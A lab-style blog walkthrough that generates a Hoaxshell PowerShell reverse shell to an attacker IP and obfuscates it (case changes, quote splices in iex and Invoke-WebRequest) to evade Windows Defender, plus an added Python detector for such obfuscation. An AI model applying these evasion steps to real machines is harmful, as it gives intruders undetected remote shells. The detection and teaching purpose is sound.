Evading Detection with Hoaxshell Obfuscation — A Tool to Bypass Windows Defender

Cybertech Maven, published in InfoSec Write-ups
Jun 2, 2023 · 6 min read

Introduction

In this ethical hacking project, I demonstrate how to generate and obfuscate a PowerShell payload with Hoaxshell so that it bypasses Windows Defender Antivirus.

Hoaxshell is a Windows reverse shell tool that generates a PowerShell backdoor payload together with a matching handler. It communicates over HTTPS and has gone undetected by Windows Defender and possibly other AV solutions.

Windows Defender has recently started detecting Hoaxshell, but with a tool called AMSI Trigger we can find which parts of the Hoaxshell-generated PowerShell backdoor are flagged and modify them. This allows the payload to bypass Windows Defender undetected, and possibly other antiviruses.

Before we begin, it’s important to note that for an ideal penetration test, it is advisable to download AMSI Trigger on a separate Windows machine to avoid triggering alerts and creating unnecessary noise. However, we will utilize both AMSI Trigger and the PowerShell payload on the Windows 10 victim machine for this educational example.

I adhered to ethical standards throughout this project and never engaged in illegal or malicious activities. However, as a cybersecurity enthusiast, learning about potential vulnerabilities and attack vectors is crucial to better protect against them.

Disclaimer:

All information, techniques, and tools described in this write-up are for educational purposes only. Use anything in this write-up at your discretion; I cannot be held responsible for any damages caused to any systems or yourselves legally. Using all tools and techniques described in this write-up for attacking individuals or organizations without their prior consent is highly illegal. You must obey all applicable local, state, and federal laws. I assume and accept no liability and will not be responsible for any misuse or damage caused by using the information herein.

Lab Setup

I have two virtual machines (VM) open for this ethical hacking project:

Kali Linux (attacker)

Windows 10 (victim)

On Windows 10 victim, I have all the security options enabled, and it’s fully updated and patched.

Let’s begin…

Hoaxshell Payload

In Kali Linux, start Hoaxshell by running the following script:

./hoaxshell.py -s 10.40.1.116 -r -H "Authorization"

  • -s = server (attacker IP address)
  • -r = raw payload
  • -H = header (Authorization)

It gives us a raw PowerShell payload, and it creates a listener unique to this payload.

Copy the payload.

Paste the payload in the PowerShell of the victim machine.

Remember, ideally, it wouldn’t be the victim machine, but this is just for demonstration purposes.

As we can see, Windows Defender has blocked the payload.

Copy the payload again.

In the same directory as AMSI Trigger, in the Downloads folder, create a text file.

Paste the payload in the Text Document.

Set the file name to payload.ps1 (or any name you like) and set Save as type to All Files.

Delete the New Text Document; it’s no longer needed.

Hold Shift and right-click inside the Downloads directory, then click Open PowerShell window here.

AmsiTrigger

In PowerShell, run the following command:

.\AmsiTrigger_x64.exe -i .\payload.ps1

The command's output shows which parts of the payload Windows Defender flags; the offending text is printed inside double quotes. It is easier to compare this output against the payload with the Notepad file open alongside it.

In Notepad, we can modify the payload in three different ways:

  1. Modify the variables — anything after $ is a variable.
  2. Change the case of letters, as in the first modification below.
  3. Add single quotes throughout the payload, as in the remaining modifications below.

Case change:

UseBasicParsing → USEBaSicparsing

Single quotes:

(Invoke-WebRequest → (Invoke-Web''Request
($r=iex → ($r=ie''x
-InputObject → -Inpu''tObject
-WebRequest → -WebR''equest
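The three modifications above are cosmetic: a single quote pair inside a word is an empty string literal that PowerShell concatenates away, and cmdlet names are case-insensitive, so the command that runs is unchanged while a naive signature over the script text misses it. The following is an added example, written for this page from the defender's side; it is not Hoaxshell or AmsiTrigger code and not the author's payload. It normalises PowerShell text the way a reviewer of script-block logs would need (drops in-word `''` splices, case-folds), then flags lines that fetch remote content and evaluate it in the same line, lines that contain splices, and known names spelled in non-standard casing. The sample lines, the regular expressions and the function names (`normalize`, `odd_casing`, `score_line`, `triage`) are my own constructions.

```python
import re

# Constructed sample lines (not the real Hoaxshell payload), modelled on the
# modifications described in the write-up: a benign request, an obfuscated
# download-and-execute line, a benign file listing, and an unobfuscated
# download-and-execute line.
SAMPLE_LINES = [
    "$r = Invoke-WebRequest -UseBasicParsing -Uri https://intranet.example/status",
    "$c=(Invoke-Web''Request -USEBaSicparsing -Uri $p$s/x -Headers @{\"Authorization\"=$i}).Content;"
    "$r=ie''x $c;$r=Out-String -Inpu''tObject $r",
    "Get-ChildItem -Path C:\\Users -Recurse | Out-String -Width 200",
    "$c=(Invoke-WebRequest -UseBasicParsing -Uri $u).Content; iex $c",
]

# An empty string literal spliced into the middle of a word: ie''x, Invoke-Web''Request.
# PowerShell concatenates the pieces, so the command still resolves; a plain
# substring match on the logged text does not.
SPLICE_IN_WORD = re.compile(r"(?<=\w)(''|\"\")(?=\w)")

WEB_REQUEST = re.compile(r"\b(invoke-webrequest|iwr)\b")
EVAL = re.compile(r"\b(invoke-expression|iex)\b")

# Names whose spelling is checked for unusual casing. Canonical, all-lower and
# all-upper are accepted; anything else (USEBaSicparsing) is reported.
CANONICAL_NAMES = ["Invoke-WebRequest", "UseBasicParsing", "Invoke-Expression", "InputObject"]


def normalize(line: str) -> str:
    """Undo the two cosmetic tricks before matching: drop in-word splices and case-fold."""
    return SPLICE_IN_WORD.sub("", line).lower()


def odd_casing(line: str) -> list[str]:
    """Return known names written in a casing that is neither canonical, lower nor upper."""
    despliced = SPLICE_IN_WORD.sub("", line)
    found = []
    for name in CANONICAL_NAMES:
        for match in re.finditer(re.escape(name), despliced, re.IGNORECASE):
            raw = match.group(0)
            if raw not in (name, name.lower(), name.upper()):
                found.append(raw)
    return found


def score_line(line: str) -> list[str]:
    """Return the reasons a line is suspicious; an empty list means nothing fired."""
    normalized = normalize(line)
    reasons = []
    # Behavioural rule: fetching remote content and evaluating it on the same line.
    if WEB_REQUEST.search(normalized) and EVAL.search(normalized):
        reasons.append("web-request-then-eval")
    # Cosmetic rules: the presence of the obfuscation itself is a signal.
    if SPLICE_IN_WORD.search(line):
        reasons.append("empty-string-splice")
    reasons.extend(f"odd-casing:{raw}" for raw in odd_casing(line))
    return reasons


def triage(lines: list[str]) -> dict[int, list[str]]:
    """Map line index -> reasons for every line that fired at least one rule."""
    result = {}
    for index, line in enumerate(lines):
        reasons = score_line(line)
        if reasons:
            result[index] = reasons
    return result


if __name__ == "__main__":
    for index, reasons in triage(SAMPLE_LINES).items():
        print(f"line {index}: {', '.join(reasons)}")
```

Run it over the ScriptBlockText of Microsoft-Windows-PowerShell/Operational Event ID 4104 records, or over .ps1 files at rest. Script block logging records the text as it was written, splices included, which is why matching has to normalise first. The behavioural rule (fetch, then evaluate) is the one worth alerting on, since it fires on the unobfuscated line as well and does not depend on any particular obfuscation trick.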

Save the modified payload.

Click File → Save.

Rerun the AMSI Trigger command. We can see that the payload is no longer detected.

.\AmsiTrigger_x64.exe -i .\payload.ps1

Open the payload notepad and copy the newly modified payload.

Paste the newly modified payload in the victim machine.

Execute the newly modified payload in the victim machine.

We have a shell on our victim machine. Typing hostname shows the hostname of the Windows 10 victim machine, Admin. Typing ls shows the AmsiTrigger exe and payload.ps1 in the directory.

We can also type ipconfig to see the IP address of the Windows 10 victim machine.

All security options remain enabled while the shell is running on the victim machine, which shows that the payload went undetected.

Press Ctrl + C to terminate Hoaxshell.

Conclusion

This article has provided a glimpse into ethical hacking by demonstrating how to employ Hoaxshell, a Windows reverse shell tool, to generate and obfuscate a PowerShell payload for bypassing Windows Defender undetected.

It is crucial to emphasize that the techniques and tools discussed here are intended solely for educational purposes. Therefore, exercising discretion and adhering to legal and ethical standards is essential when using any information presented in this article. The reader is responsible for complying with all applicable laws and regulations governing these tools and techniques.

As cybersecurity enthusiasts, we aim to learn about potential vulnerabilities and attack vectors to enhance our ability to protect against them. By increasing awareness of these issues, we contribute to the collective effort to safeguard individuals and organizations from online threats.

Remember, the information presented in this article should never be used to attack individuals or organizations without their prior consent. It is essential to respect the boundaries of legality and ethical conduct. Misusing the information herein can lead to severe consequences, including legal ramifications.

I hope you have found this article informative and valuable. Your feedback and suggestions are always welcome as we continue to explore diverse topics in the field of cybersecurity. Thank you for your interest and support!

Cybersecurity Researcher | Ethical Hacker | Security Analyst | Web App Pentester | Threat Intelligence